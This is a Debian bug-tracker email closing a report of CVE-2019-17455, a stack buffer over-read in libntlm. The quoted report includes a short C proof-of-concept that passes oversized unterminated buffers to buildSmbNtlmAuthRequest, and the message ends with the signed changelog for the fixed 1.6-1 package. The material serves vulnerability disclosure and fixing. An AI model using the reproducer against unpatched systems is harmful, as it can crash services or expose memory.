Your message dated Sun, 19 Apr 2020 09:34:43 +0000
with message-id <[email protected]>
and subject line Bug#942145: fixed in libntlm 1.6-1
has caused the Debian Bug report #942145,
regarding libntlm: CVE-2019-17455
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
942145: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=942145
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Source: libntlm
Version: 1.5-2
Severity: important
Tags: security upstream
Forwarded: https://gitlab.com/jas/libntlm/issues/2
Control: found -1 1.5-1
Hi,
The following vulnerability was published for libntlm.
CVE-2019-17455[0]:
| Libntlm through 1.5 relies on a fixed buffer size for
| tSmbNtlmAuthRequest, tSmbNtlmAuthChallenge, and tSmbNtlmAuthResponse
| read and write operations, as demonstrated by a stack-based buffer
| over-read in buildSmbNtlmAuthRequest in smbutil.c for a crafted NTLM
| request.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2019-17455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17455
[1] https://gitlab.com/jas/libntlm/issues/2
Please adjust the affected versions in the BTS as needed.
Reproducer for the issue:
,---- [ poc.c ]
| #include<ntlm.h>
| #include<stdio.h>
| #include<stdlib.h>
| #include<string.h>
| extern void buildSmbNtlmAuthRequest(tSmbNtlmAuthRequest * request, const
char *user, const char *domain);
| int main (void)
| {
| char user[1024];
| char domain[1024];
| memset(user,'a',1024);
| memset(domain,'b',1024);
| tSmbNtlmAuthRequest request;
| tSmbNtlmAuthChallenge challenge;
| tSmbNtlmAuthResponse response;
| buildSmbNtlmAuthRequest (&request, user, domain);
| return 0;
| }
`----
(copile with ASAN to verify the issue).
Regards,
Salvatore
--- End Message ---
--- Begin Message ---
Source: libntlm
Source-Version: 1.6-1
Done: Simon Josefsson <[email protected]>
We believe that the bug you reported is fixed in the latest version of
libntlm, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Simon Josefsson <[email protected]> (supplier of updated libntlm package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Sun, 19 Apr 2020 10:42:28 +0200
Source: libntlm
Binary: libntlm0 libntlm0-dbgsym libntlm0-dev
Architecture: source amd64
Version: 1.6-1
Distribution: unstable
Urgency: low
Maintainer: Debian Authentication Maintainers
<[email protected]>
Changed-By: Simon Josefsson <[email protected]>
Description:
libntlm0 - NTLM authentication library
libntlm0-dev - Development files for the NTLM authentication library
Closes: 942145
Changes:
libntlm (1.6-1) unstable; urgency=low
.
* New upstream version.
- Fixed CVE-2019-17455 security issue. Closes: #942145.
* Add Rules-Requires-Root: no.
* Replace debian/compat with B-D on debhelper-compat (= 12).
* Update Standards-Version from 4.4.0 to 4.5.0.
* Use https in Homepage:.
* Update upstream signing key. Fixes public-upstream-key-not-minimal.
* Add upstream/metadata.
Checksums-Sha1:
d46b1690d6dc194b12a8f74e2a4de0fcf30bc385 1906 libntlm_1.6-1.dsc
d6f9b69f154d82d0f9a49e9686b79fc03f21c3c6 688608 libntlm_1.6.orig.tar.gz
d8722f4ccd2c5747cdf873f011bb5c7a72d0e9a3 228 libntlm_1.6.orig.tar.gz.asc
c81c0360c66fffd0c97112211ae8513900f17df2 5500 libntlm_1.6-1.debian.tar.xz
9ab7f43d3bbc3b96e4356e985bf6366667bff975 29308 libntlm0-dbgsym_1.6-1_amd64.deb
b285920f4112f034aa9c420cd8a8eab5c2821e2e 27776 libntlm0-dev_1.6-1_amd64.deb
db48072492b1abb194eb20e8e1f7b2694aa89959 23208 libntlm0_1.6-1_amd64.deb
77b3965e395a7c1a47c2a79a7923fd421f4c9443 5559 libntlm_1.6-1_amd64.buildinfo
Checksums-Sha256:
a4f4fa585ed082015c259b5181a7a1479d20d551222c129dfaa3574a7e49f2b3 1906
libntlm_1.6-1.dsc
f2376b87b06d8755aa3498bb1226083fdb1d2cf4460c3982b05a9aa0b51d6821 688608
libntlm_1.6.orig.tar.gz
39949562bc9625cccb94a6a37387803917eabc24f7a0692141733b0128bf69ea 228
libntlm_1.6.orig.tar.gz.asc
ec2694d3e35e38ccd5e4b776640f15091b340169423a9b011f87a99898c3e197 5500
libntlm_1.6-1.debian.tar.xz
a196a5af9367fac1118e71d6ffd1826ea15e9dad63cf5bb73db2ec20b8d85f50 29308
libntlm0-dbgsym_1.6-1_amd64.deb
1aadb7445c95e3ce66e94b9ad16aac6ce6896e4ff958c97444465cf6bb2b7018 27776
libntlm0-dev_1.6-1_amd64.deb
95cac3b5667eec41e98f2046da401c0b28bd3e3cf3bbac4c3bb7630a3f9442a9 23208
libntlm0_1.6-1_amd64.deb
ad81240f1199297e6753fcd50db7e91954cc9793e092a91071d38bc65f98ac0a 5559
libntlm_1.6-1_amd64.buildinfo
Files:
a8f13fa0fe5ce9fabffc523b1d6202a4 1906 libs optional libntlm_1.6-1.dsc
9894aeb485fa27a481b270fce5055f1c 688608 libs optional libntlm_1.6.orig.tar.gz
843df94db529feb4cf240a9a261d5f87 228 libs optional libntlm_1.6.orig.tar.gz.asc
f306f8097c8a0977746b2aecb8010224 5500 libs optional libntlm_1.6-1.debian.tar.xz
96d2c22452ad582910bc1dcd2a8b385e 29308 debug optional
libntlm0-dbgsym_1.6-1_amd64.deb
029a43c90298da48ee9f1677687a8d71 27776 libdevel optional
libntlm0-dev_1.6-1_amd64.deb
9fe55cb4697351f771671410438ebd80 23208 libs optional libntlm0_1.6-1_amd64.deb
58bb3c63a68802c08374aa1b9dd3bd47 5559 libs optional
libntlm_1.6-1_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQEzBAEBCgAdFiEEmUFc4ZBdDlWp+IAmhgt/uzL4EZ0FAl6cGHQACgkQhgt/uzL4
EZ1TvQf/bmo9hhHz+GBUxBvSsTBBofQmxNfP+0PXGaijSAFFztGb/PxxEVR+CUxO
olwIrQcZkCnUnQIgnWbLXuyHcFeGaNTKR11oDBmf9gwkTrBlxzivmTCJZhI2imoQ
2pz3yJQzelMkjEhM7ao2jHLOjbqxHWEoVcYegE5xftUDQbjK74o68cD9yKarW/M2
Fi1tsTNOsd4b2ET2IlFKJQbKhn9IGbYr/3jn5fIUHBpIHw4qpZ+Ox/W+DqCaOg9A
xuZtN+1haBOzbTCQtEcNvg00LzDwN+CkJgolQlUHI71nxewEyqDjhpe2uMAXlk8/
JaZF0IAzpPD1t/9KzoLRJyuCbZPz5Q==
=rUso
-----END PGP SIGNATURE-----
--- End Message ---